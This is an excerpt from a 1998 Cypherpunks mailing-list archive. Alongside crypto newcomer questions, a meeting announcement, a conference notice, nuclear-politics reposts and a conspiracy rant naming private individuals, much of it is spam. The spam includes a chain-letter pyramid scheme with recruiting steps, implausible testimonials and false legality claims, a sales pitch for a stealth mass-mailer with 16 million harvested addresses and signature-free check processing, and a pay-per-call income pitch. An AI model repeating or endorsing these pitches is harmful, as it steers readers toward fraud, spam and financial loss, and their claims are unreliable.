messages from this list and so far only one of them had _anything_ to do
with crypto...I know that most or all of you have a bit of background in
crypto but I am just learning.  So what I am wanting to know is a:  are
there any other crypto e-lists that are for newbies?  b:  are there any
better text philes to read that give a better introduction that is for a
newbie and c:  what do you people feel is the best encryption someone can
have that I could get?

	Thanks,

	D.

	

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sun, 31 May 1998 14:26:58 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: FYI
Message-ID: <4b356dc0.357114cb@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


If you've heard rumors about Amway being a cult, it's true.  It's part of the
right-wing/ChristianCoalition cult.  If anyone wants to see my evidence, let
me know.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: troen444@worldnet.att.net
Date: Sun, 31 May 1998 17:57:39 -0700 (PDT)
To: ccpo53urd11@generalnet.com
Subject: Earn $100 every time OUR phone rings...
Message-ID: <199806010057.RAA03064@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



ALL YOU DO IS ADVERTISE THIS 800 NUMBER! THAT'S ALL!! 

$100 goes to you for EVERY sale that the company closes!

Does the idea of making at least $1,000 per week beginning your 2nd week of 
doing business excite you? 

How about never having to sell a thing to your customer and never having 
to talk to ANYONE to make money? I don't know how this could get any easier.

Take a look at my latest WEEKLY commission checks: 
    http://www.cyberdue.com/fortune/

EVERY aspect of selling or talking to someone is DONE COMPLETELY by the company!  

The number one home based business for the 2nd year in a row, Fortune 5000 
is a member of the Better Business Bureau and the U.S. Chamber of Commerce.

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and 
  sends you WEEKLY commission checks! 

* It pays you a $100 commission (that's over 50% of the total sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your first 
  week or two... Quick commission earnings build and maintain motivation. 
  ALL YOU DO IS ADVERTISE the toll-free number and your ID number. 

* You can get STARTED TODAY. Just advertise the business toll-free 
  number with your ID # and let this business CLOSE YOUR SALES every day...
  They do all the work and YOU GET PAID FOR IT! 

* You may advertise any way you choose: Bulk E-Mail, Flyers, Classifieds, 
  Postcards, etc. Suppose you use bulk E-Mail, as I am: 100,000 E-Mails
  with a 1/10th of a percent (0.1%) sales rate at $100 per sale nets 
  $10,000... not too bad.

There is nothing else out there that will provide you with an immediate income 
beginning THIS WEEK with minimal effort.

Before you call, I want you to think about the quality of the live 
operators handling your call. I am convinced you will not find 
a better team of closers for your own personal sales.  You will 
clearly understand what I am talking about once you call.  

PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!

1-800-811-2141

You will be asked for ID #50030 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through Saturday and 
will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949, 888-446-6951
or 888-731-3457 (all toll free). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 2 Jun 1998 23:20:54 -0700 (PDT)
To: j orlin grabbe <jim.moran@mail.house.gov
Subject: Dr. Abdul Qadeer [Kahn]
Message-ID: <3571FB7B.7338@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunday 5/31/98 6:06 PM

J Orlin Grabbe

Read at http://www.aci.net/kalliste/ tonight

  India vs. Pakistan
  Another Pakistan Nuke..  Dr. Abdul Qadeer

Friday  5/15/1998 Albuquerque Journal, Universal Press Syndicate,
Syndicated Columnist Richard Reeves writes

  U.S. Indignation at India's Nuclear Testing Hypocritical
  
  London -  So, India has conducted its second test of a nuclear weapon,
and its
  third, fourth, and fist and sixth, in the past few days.  That put it
1,026 tests
  behind the United States. ...
    This has been coming for a long, time - and we have been foolish or
deliberately
  looking the wrong way for decades. Fifteen years ago, in 1983, we the
Reeves family,
  were living in the district called E-7, the best neighborhood in
Islamabad, the capital of 
  Pakistan.  (My wife was doing work involving refugee camps in the
northwest of the 
  country, across the border from the Afghan-Soviet war.)
    Like everyone else around there, including American diplomats, we
knew why military
  car arrived each morning to take the fellow around the corer, Abdel
Qadeer Kahn, to his
  office - or laboratory.  Kahn was in charge of building the bomb out
in the Pakistani desert
  at a place called Kahuta. This was the so-called "Islamic bomb" ready
for use against India,
  which had conducted its first test in 1974.  Whatever we though,
Pakistanis believed nuclear
  weapons were essential to checkmate the change of being overwhelmed by
India., their
  10-time-as-big neighbor.  ...

Small world. See Los Angeles Times syndicated columnist Richard Reeves
at http://www.jya.com/whp052898.htm

John Young's voice telephone is being picked-up by his fax tonight.

Let's all hope for prompt peaceful settlement of the unfortunate matter.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 2 Jun 1998 23:22:58 -0700 (PDT)
To: j orlin grabbe <democratic.caucus@mail.house.gov
Subject: Reeves 5/15/98 conclusion
Message-ID: <35720025.1B0A@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunday 5/31/98 7:03 PM

Orlin

I erred by not transcribing Reeve's conclusion in his Friday  5/15/1998
Albuquerque Journal editorial

     Our policy is not stupid.  It's hypocritical and delusionary, but
not stupid.  What was stupid   was to actually believe that countries
like India, Pakistan, China, and Iran and Israel, too,    would act on
American words and illusions rather than on their own national interests
and fears.    This American blunder of intelligence  and intellect is
not another inside-the-beltway,   Ken-and-Monica joke.  This is an
affair of state, a failure of state. Officials should not be  
subpoenaed or mocked;  they should resign or be fired.

Let ALL hope for release of the documents requested at
http://www.jya.com/whp052898.htm and peaceful
settlement of another "American blunder of intelligence".

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sun, 31 May 1998 17:36:52 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Re: FYI
Message-ID: <322a25d9.3571f777@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone wrote me in private - 
<< Yes, we want to see
 
 On Sun, 31 May 1998 StanSqncrs@aol.com wrote:
 
 > If you've heard rumors about Amway being a cult, it's true.  It's part of
the
 > right-wing/ChristianCoalition cult.  If anyone wants to see my evidence,
let
 > me know. >>

I caught an Amway employee (works in Ada and everything) on a music list
engaging in the censorship of the messages in that band's music.

But first, a who's who of the people involved in the war on the Arts/Music -

gopher://gopher.igc.apc.org/00/orgs/alternet/demval/cultwars

You'll notice Mr. and Mrs. Richard DeVos of the DeVos foundation listed, his
son runs Amway, and Richard was the guy who started it (along with another
person).

Here's my Amway employee threatening to use Amway lawyers against someone (me)
simply trying to speak on a music list - 
=====
In a message dated 4/27/98 8:43:23 AM Central Daylight Time,
Russell_Gorton@amway.com writes: <snip>

<< ... buddy.  I'm
      just down the hall from a team of about 80 high-powered lawyers who
      are fledgling experts in Internet harassment issues (amway.com is a
      very-flamed, very-hacked, very high-profile domain. >>

<snip>

<< --Russell Thomas Gorton  Amway Corporation (yup, the direct-sell soap
empire) Ada, Michigan, USA >>
=====
Of course, I do admit, that I do speak from a left POV. ;-)

You see, the band is a band called Camel, and I like to talk about their
lyrics.  One song's lyrics I posted was this one -
=====
'Refugee' - 'Stationary Traveer' (lyrics by Susan Hoover)

There's a rumour flying through the air
Paranoia's creeping everywhere.
You're gonna raise a wall -
to draw the line

You say you've got your reasons
I hear them all the time
You say it's talking treason
and a crime ...
to question why

Don't you know I've seen this all before?
History repeats itself once more.
I don't want to go -
and I can't stay

You say you've got your reasons
I hear them all the time
You say it's talking treason
and a crime ...
to question why

I don't want to be a refugee,
I just want a single guarantee.
I don't want to be a refugee
I JUST WANT THE RIGHT TO DISAGREE.
=====
Basicly, Russell is part of a right-wing gang working the Camelogue list.  It
is documented here - http://members.aol.com/whtsametau/ofir.html.  It's called
The Humpheads.  When you get the the code - "&y", though, haven't updated
that.  Here's something I snuck to the Camelogue list -
=====
3) Fish.  X-tian fish.  You can find a real one here on &y's server (if not in
the supposed user's address ;-) ) - http://www.roadkill.com/~dpgerdes/

But these guys don't like to do business with folk other than their own,
that's why they use that symbol.  Here's where &y's X-tian fish is - "&y".
Take the & and remove the top loop of it in your mind, and it certainly looks
MUCH like an X-tian fish!

That's how I found &y's picture, I looked for that symbol on his server.  You
see, his compadres know what to look for.  Can you say "right-wing
conspiracy"?  Sure, I knew ya could!
=====
&y (Andy) Burnett is the "moderator nazi" (his words) of that list.  He has no
real info about himself on his facad server - Roadkill Consulting
(www.roadkill.com).  But he had a picture stashed (in a 5 meg movie) in a
place that only his right-wing buddies (or someone observing the right-wing
conspiracy) would think to click.  On one of his supposed user's boring pages
at the very bottom in fine print where he thanks "&y" for his webspace, and
the "&y" is a link. 

So, if you also see a bunch of evidence against folk other than the Amway
employee, remember, that Amway employee is part of a gang, and that
accomplices in crimes are JUST as guilty as the actual trigger-person,
therefore, you need to know what his compadres are also doing.

Stan,
'Wall of Reality' Webring
http://members.aol.com/RealityWal/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: waconsult@yahoo.com
Date: Sun, 31 May 1998 21:24:26 -0700 (PDT)
To: u@public.com
Subject: 4 U
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Hello there,


I make a habit of deleting mail I have not yet read, as I'm
sure you do also. Please read this one though, you might
find this interesting.

"I recently lost my high paying job from a major computer
corporation due to their loss of a major contract. They
messed up, but that whole department of 15 people including
myself are hung out to dry. Corporate America at it's
finest. I have not had luck yet finding another job, as my
skills were very specific to that company and not really
worth anything to another company.

During the time I worked there, I also bought and sold real
estate like those guys on TV. (yes, you can do that and make
it work for you too) The key is I made it work. I was fairly
successful until the 'Nightmare on Pleasant St.' as my
friends and I call it ... I lost most of my money in that
one bad deal and I was no longer financially secure and I
relied heavily on my income from my FORMER JOB.

As you've already heard, I lost that too and I started to
look for other things I could make money to help me get back
on my feet. So, I started to read all of the JUNK that
people have mailed to me. Let me tell you, I can't believe
some of the things out there ... what a waste of time.

Until I saw this. Hold on.

I know you are (like I was) ready to stop reading right here
 I implore you not to. I (like you) am NOT some non-educated
fool. I have made much money for myself in Real Estate,
which is not an easy business. I am a rather competent
business man.

At least finish reading this until the end.
BETTER STILL: PRINT THIS LETTER AND READ IT IN COMFORT OVER,
AND OVER.

Here is what I saw ... 
* I only needed $20 extra dollars to try this
* this is making money for people who at least tried a
little, so why not me too?

In desperation, I sent the four 5 dollar bills and got the
reports. As I always have, I MADE this work for me too. I
took much time and effort to learn about e-mail (which is a
great and FREE tool!!) and how to send lots of it.

19 days after my first mailing of this, I have received
roughly 8,450 responses. (trust me, when my fiance` saw
8,450 five dollar bills on the kitchen table, she no longer
laughed at me for trying this)" Matthew of Basqiuat in
Evanston, IL wrote.

Here is a special offer to help you. When you order any of
the reports from EDHAY, PO BOX 13511, Sacramento CA 95815
or as long as the above address is on the address list
below, you will receive the step-by-step instructions on
HOW YOU CAN MAKE $250,000 THROUGH THIS PROGRAM in addition
to 10,000 e-mail addresses to start e-mailing your offers
immediately. It took some time and expense to put this
together so please add another $5 for handling the addresses
and the instructions. They will come to you in a .txt format.
You will get the list of addresses and instructions with
your report.

If you follow the directions in this e-mail and be prepared
to eventually set aside about an hour each day to follow up
(and count your money!), you will make it. You don't need to
be a computer whiz, but I'll bet you already are. If you can
open an envelope, remove the money, and send an e-mail
message, then you're on your way to the bank. Take the time
to read this so you'll understand how easy it is. If I can
do this, so can you!

SAVE THIS E-MAIL IN A FOLDER OF YOUR CHOICE BY CLICKING ON
'Save As' IN THE 'File' MENUE AT THE TOP LEFT CORNER OF THIS
WINDOW. GIVE IT AN APPROPRIATE FILE NAME AND CHOOSE 'Plain
Text' AS THE FILE TYPE FORMAT. THAT WAY, YOU WILL HAVE A
COPY OF THIS FOR FUTURE USE.

This is a LEGAL, MONEY-MAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT
AGAIN!!!

You are about to embark on the most profitable and unique
program you may ever see. Many times over, it has demonstrated
and proven its ability to generate large amounts of cash. This
program is showing fantastic appeal with a huge and
ever-growing on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity. It
does not require you to come in contact with people, do any
hard work, and best of all, you never have to leave the
house, except to get the mail and go to the bank!

This truly is that lucky break you've been waiting for!
Simply follow the easy instructions in this letter, and your
financial dreams will come true! When followed correctly,
this electronic, multi-level marketing program works
perfectly ... 100% EVERY TIME!

Thousands of people have used this program to:
   - Raise capital to start their own business
   - Pay off debts
   - Buy homes, cars, etc.,
   - Even retire!

This is your chance, so don't pass it up!


GO FOR IT NOW!
Ed Hay





******* P R O G R A M   O V E R V I E W *******

Basically, this is what we do:
We send thousands of people a product for $5.00 that costs
next to nothing to produce and e-mail. As with all
multi-level businesses, we build our business by recruiting
new partners and selling our products. Every state in the
U.S. allows you to recruit new business online (via your
computer).

The products in this program are a series of four business
and financial reports costing $5.00 each. Each order you
receive via "snail mail" will include:
  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report
they ordered

To fill each order, you simply e-mail the product to the
buyer. THAT'S IT! The $5.00 is yours! This is the EASIEST
electronic business anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND BE PREPARED TO
REAP THE STAGGERING BENEFITS!



******* I N S T R U C T I O N S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't
sell them if you don't order them):
   * For each report, send $5.00 CASH, the NAME & NUMBER OF
THE REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
RETURN POSTAL ADDRESS (in case of a problem) to the person
whose name appears on the list next to the report.
   * When you place your order, make sure you order each of
the four reports. You will need all four reports so that you
can save them on your computer and resell them.
   * Within a few days you will receive, via e-mail, each of
the four reports. Save them on your computer so they will be
accessible for you to send reports to the 1,000's of people
who will order them from you.

2. IMPORTANT-- DO NOT alter the names of the people who are
listed next to each report, or their sequence on the list,
in any way other than is instructed below in steps "a"
through "e" or you will lose out on the majority of your
profits. Once you understand the way this works, you'll
also see how it doesn't work if you change it. Remember,
this method has been tested, and if you alter it, it will
not work.
   a. Look below for the listing of available reports.
   b. After you've ordered the four reports, replace the
name and address under REPORT #1 with your name and address,
moving the one that was there down to REPORT #2.
   c. Move the name and address that was under REPORT #2
down to REPORT #3.
   d. Move the name and address that was under REPORT #3
down to REPORT #4. The name and address that was under
REPORT #4 is removed from the list and has NO DOUBT
collected their 50 grand.
   e. Please make sure you copy everyone's name and address
ACCURATELY!!!

3. Take this entire letter, including the modified list of
names, and save it to your computer. Make NO changes to the
instruction portion of this letter.

4. Now you're ready to start an e-mail campaign on the World
Wide Web! E-mailing is very, very inexpensive. You can buy
e-mail lists for under $20/2,000 addresses or you can pay
someone a minimal charge to take care of it for you. For
additional $5, you will receive 10,000 e-mail addresses and
the step-by-step instructions on HOW YOU CAN MAKE $250,000
through this program when you order any of the reports from
me, EDHAY, PO BOX 13511, Sacramento CA 95815. START YOUR
E-MAIL CAMPAIGN IMMEDIATELY!

5. For every $5.00 you receive from interested participants,
all you must do is e-mail them the report they ordered.
THAT'S IT! ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!
This will guarantee that the e-mail THEY send out, with YOUR
name and address on it, will be prompt because they can't
send their e-mails until they receive the reports!



******* R E P O R T S *******

Notes:
- ALWAYS SEND $5 CASH FOR EACH REPORT
- Order Each REPORT by NUMBER and NAME
- ALWAYS SEND YOUR ORDER VIA REGULAR MAIL
- Make sure the cash is concealed by wrapping it in at least
two sheets of paper
- On one of those sheets of paper, include: (a)the number &
name of the report you are ordering, (b)your e-mail address,
and (c)your postal address.

______________________________________________
REPORT #1 "HOW TO REORGANIZE YOUR TIME TO ACCOMIDATE A HOME
BASED BUSINESS"
 
ORDER REPORT #1 FROM:
       WA Consult
       2511 S Illinois Ave, Suite 35
       Carbondale, IL 62901
______________________________________________
REPORT #2 "MAJOR CORPORATIONS AND E-MAIL"

ORDER REPORT #2 FROM:
       EDHAY
       PO BOX 13511
       Sacramento, CA 95853
______________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
       SMINC
       1435 Warner Street, Suite 8
       Chico, CA 95926
______________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
       Basqiuat
       PO BOX 1663
       Evanston, IL 60205
______________________________________________




******* H O W   D O E S   I T   W O R K ? *******

Let's say you decide to start small just to see how well it
works. Assume your goal is to get 10 people to participate on
your first level. (Placing a lot of FREE ads on the internet
will EASILY get a larger response.) Also assume that everyone
else in YOUR ORGANIZATION gets ONLY 10 downline members.
Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with $5.........................$50
2nd level--10 members from those 10 ($5 x 100)............$500
3rd level--10 members from those 100 ($5 x 1,000).......$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
--------------------------------------------------------------
A TOTAL OF.............................................$55,550
--------------------------------------------------------------

Remember friends, this assumes that the people who participate
only recruit 10 people each. Think for a moment what would
happen if they got 20 people to participate! Most people get
100's of participants! THINK ABOUT IT! Your cost to
participate in this is practically nothing (surely you can
afford $20). You obviously already have an internet connection
and e-mail is FREE!!! REPORT#3 shows you the most productive
methods for bulk e-mailing and purchasing e-mail lists. Some
list & bulk e-mail vendors even work on trade!

About 50,000 new people get online every month!



******* T I P S   F O R   S U C C E S S *******

 * TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and
follow the directions accurately.
 * Send for the four reports IMMEDIATELY so you will have them
when the orders start coming in because when you receive a
$5 order, you MUST send out the requested product/report to
comply with the U.S. Postal & Lottery Laws, Title 18,Sections
1302 and 1341 or Title 18, Section 3005 in the U.S. Code, also
Code of Federal Regs. Vol. 16, Sections 255 and 436, which
state that 'a product or service must be exchanged for money
received.'
 * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
 * Be patient and persistent with this program. If you follow
the instructions exactly, the results WILL undoubtedly be
SUCCESSFUL!
 * ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED




******* S U C C E S S   G U I D E L I N E *******

Follow these guidelines to guarantee your success:
 * If you don't receive 10 to 20 orders for REPORT #1 within
two weeks, continue advertising until you do.
 * Then, a couple of weeks later you should receive at least
100 orders for REPORT #2. If you don't, continue advertising
until you do.
 * Once you have received 100 or more orders for REPORT #2,
YOU CAN RELAX, because the system is already working for you,
and the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:
Every time your name is moved down on the list, you are placed
in front of a DIFFERENT report. You can KEEP TRACK of your
PROGRESS by watching which report people are ordering from you
 If you want to generate more income, send another batch of
e-mails and start the whole process again! There is no limit
to the income you will generate from this business!

NOTE:
If you need help with starting a business, registering a
business name, how income tax is handled, etc., contact your
local office of the Small Business Administrations (a Federal
agency) for free help and answer to questions. Also, the
Internal Revenue Service offers free help via telephone and
free seminars about business taxes.



******* T E S T I M O N I A L S *******

______________________________________________


This program does work, but you must follow it EXACTLY!
Especially the rule of not trying to place your name in a
different position, it won't work and you'll lose a lot of
potential income. I'm living proof that it works. It really is
a great opportunity to make relatively easy money, with little
cost to you. If you do choose to participate, follow the
program exactly, and you'll be on your way to financial
security.

Sean McLaughlin, Jackson, MS
______________________________________________


My name is Frank. My wife, Doris, and I live in Bel-Air, MD.
I am a cost accountant with a major U.S. Corporation and I
make pretty good money. When I received the program I grumbled
to Doris about receiving "junk mail." I made fun of the whole
thing, spouting my knowledge of the population and percentages
involved. I "knew" it wouldn't work. Doris totally ignored my
supposed intelligence and jumped in with both feet. I made
merciless fun of her, and was ready to lay the old "I told you
so" on her when the thing didn't work ... well, the laugh was
on me! Within two weeks she had received over 50 responses.
Within 45 days she had received over $147,200 in $5 bills! I
was shocked! I was sure that I had it all figured and that it
wouldn't work. I AM a believer now. I have joined Doris in her
"hobby." I did have seven more years until retirement, but I
think of the "rat race" and it's not for me. We owe it all to
MLM.

Frank T., Bel-Air, MD
______________________________________________


The main reason for this letter is to convince you that this
system is honest, lawful, extremely profitable, and is a way
to get a large amount of money in a short time. I was
approached several times before I checked this out. I joined
just to see what one could expect in return for the minimal
effort and money required. To my astonishment, I received
$36,470.00 in the first 14 weeks, with money still coming in.

Sincerely yours, Phillip A. Brown, Esq.
______________________________________________


Not being the gambling type, it took me several weeks to make
up my mind to participate in this plan. But conservative that
I am, I decided that the initial investment was so little that
there was just no way that I wouldn't get enough orders to at
least get my money back. Boy, was I surprised when I found my
medium-size post office box crammed with orders! For awhile,
it got so overloaded that I had to start picking up my mail at
the window. I'll make more money this year than any 10 years
of my life before. The nice thing about this deal is that it
doesn't matter where in the U.S. the people live. There simply
 isn't a better investment with a faster return.

Mary Rockland, Lansing, MI
______________________________________________


I had received this program before. I deleted it, but later I
wondered if I shouldn't have given it a try. Of course, I had
no idea who to contact to get another copy, so I had to wait
until I was e-mailed another program ... 11 months passed then
it came ... I didn't delete this one! ... I made more than
$41,000 on the first try!!

D. Wilburn, Muncie, IN
______________________________________________


This is my third time to participate in this plan. We have
quit our jobs, and will soon buy a home on the beach and live
off the interest on our money. The only way on earth that this
plan will work for you is if you do it. For your sake, and for
your family's sake don't pass up this golden opportunity. Good
luck and happy spending!

Charles Fairchild, Spokane, WA
______________________________________________


ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO
FINANCIAL FREEDOM!!!


If you are not interested, we apologize for the intrusion.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 6 May 1998 17:12:19 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE Bay Area Cypherpunks Meeting - May 9, 12-6pm
Message-ID: <3.0.5.32.19980506155016.008dd510@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The May Bay Area Cypherpunks Meeting will be Saturday at
Temenos, 459 Fulton St. Suite 307, San Francisco.

Some planned agenda items include
- GSM crack hardware demo - Lucky Green
- GSM cryptanalysis details - Ian Goldberg
- Anon mailbox servers - Lucky Green
- OpenPGP status
- hacks in progress

The meeting will be at the usual time - mill around at 12,
organized part starts at 1, dinner nearby later.

459 Fulton is a few blocks west of Van Ness, 
probably closest to the Civic Center BART stop.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Wed, 6 May 1998 16:16:13 -0700 (PDT)
Subject: No Subject
Message-ID: <199805062316.QAA22622@toad.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: global202@yahoo.com
Date: Mon, 11 May 1998 03:02:44 -0700 (PDT)
To: Friend@public.com
Subject: The Internet Success ToolBox
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Note:We do not wish to send e-mail to anyone that does
not want it so please send an e-mail to:
remove98@yahoo.com
You will be removed promptly.
*****************************************************************

"THE INTERNET SUCCESS TOOLBOX"
The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on  CD-ROM:

1. Submit Spider Software - Professional Version ($99.90 value) - 
The new and improved version just released. Created specifically 
to meet the needs of those who  want their web pages to get 
NOTICED and placed in the TOP of the Search   Engines! This 
software automates  the process of submitting your site and 
uses powerful technology to get your site listed in the TOP positions.

2. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting to
either 20 different mail servers, or a single mail server 20 times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

3. E-Mail Pro Extractor ($350.00 value) - This one of a kind software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

4. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that allows
you to easily and legally process checks by fax, phone or Internet.
The customer's signature on the check is not necessary. 

5. 16 Million E-mail Addresses ($149.00 value) - We took a total of 
over 92 million e-mail addresses from many of the touted CD's that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we  eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on  CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $395.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $600.00 !!!

To order: 

____ YES!  I'm bursting with anticipation!  Please send me "The 
Internet Success Toolbox" so I can start advertising my business to 
"millions of people" - absolutely FREE!  I'm anxious to see how others 
are creating immediate "cash-flow explosions", and eliminating most of  
their advertising and marketing costs - and how I can do the same!  
Enclosed is $395.

____ YES AGAIN!  Because I'm responding within 7 days, I will receive 
6 BONUSES with a total value of $663.90 - absolutely FREE!  They include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven!  

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free Classified 
Ad Sites on the Internet" - a virtual GOLDMINE!  

BONUS #4 ($19.95 value): A FREE Special Report titled "How to Put Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - Even 
When You Don't!!"  
									
BONUS #5 ($195 value): Unlimited technical support.  Even though 
"The Internet Success Toolbox"  will be simple to use, it's great to 
know support is always available - if and when you really need it!  
And last but not least . . . .

BONUS #6 ($175 value): Order within 7 days and I'll also throw in a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total value of 
$663.90! All yours - absolutely FREE - with your purchase of our amazing
 package  "The Internet Success Toolbox " for only $395.00.

And I'll even pay for shipping your package. You can have it in days. And 
start making money THE VERY SAME DAY!

Anyway, I have a copy right here on my desk reserved for you. All I need 
is your go ahead and I'll rush it out to you along with your 6 FREE BONUSES.								

 Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________  

Fax # (______) _____________________

E-mail Address _________________________


___Visa  ___MasterCard

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
           Signature


To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: (425)379-9722
You do not need to send a hard copy of your check.
The fax is all we need.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
  Fax completed order form to: (425) 379-9722

* Orders by personal, business or credit card CHECK are shipped in 7-10 
  business days.

* Orders MAILED IN or OVERNIGHTED with CASHIER'S CHECK  or MONEY ORDER are
  shipped IMMEDIATELY. Mail to: 
                       SYS
                       11014 19th Ave SE Suite 305 
                       Everett, WA 98208.
    
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


									





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <protozoa@gwyn.tux.org>
Date: Thu, 14 May 1998 13:50:48 -0700 (PDT)
To: ellis@epic.org
Subject: EPIC Crypto Conference - last week for reduced registration (fwd)
Message-ID: <Pine.LNX.3.95.980514163806.17036A-100000@gwyn.tux.org>
MIME-Version: 1.0
Content-Type: text/plain




   Top Government Officials, Industry Leaders, Cryptography Experts
      and Public Interest Advocates to Discuss Encryption Policy

                 *** Last week for Early Registration ***

                     *** CLE Credit Application Filed ***

                             Washington, DC
                          Monday, June 8, 1998

                  http://www.epic.org/events/crypto98/

Top government officials -- including Senator John Ashcroft (R-MO),
William Reinsch (Undersecretary of Commerce for Export Administration)
and Robert Litt (Principal Associate Attorney General) -- will discuss
current U.S. encryption policy at the largest policy conference on
cryptography ever held in Washington, D.C.  Other leading experts from
government, industry, the public interest community and academia will
also debate important legal, political and technical issues. If you are
interested in cryptography policy, this is the one meeting you must
attend!

The 1998 EPIC Cryptography and Privacy Conference is organized by the
Electronic Privacy Information Center, in cooperation with the Harvard
University Information Infrastructure Project and the Technology
Policy Research Group of the London School of Economics.


- THE 1998 EPIC CRYPTOGRAPHY AND PRIVACY CONFERENCE -

HIGHLIGHTS

   o Meet the technical experts, industry leaders, litigators, and
     policy makers who are shaping the global debate over encryption
     and privacy.

   o Get the latest news, reports, legislative information, and
     technical results.

   o Receive the 1998 edition of the highly-acclaimed EPIC Cryptography
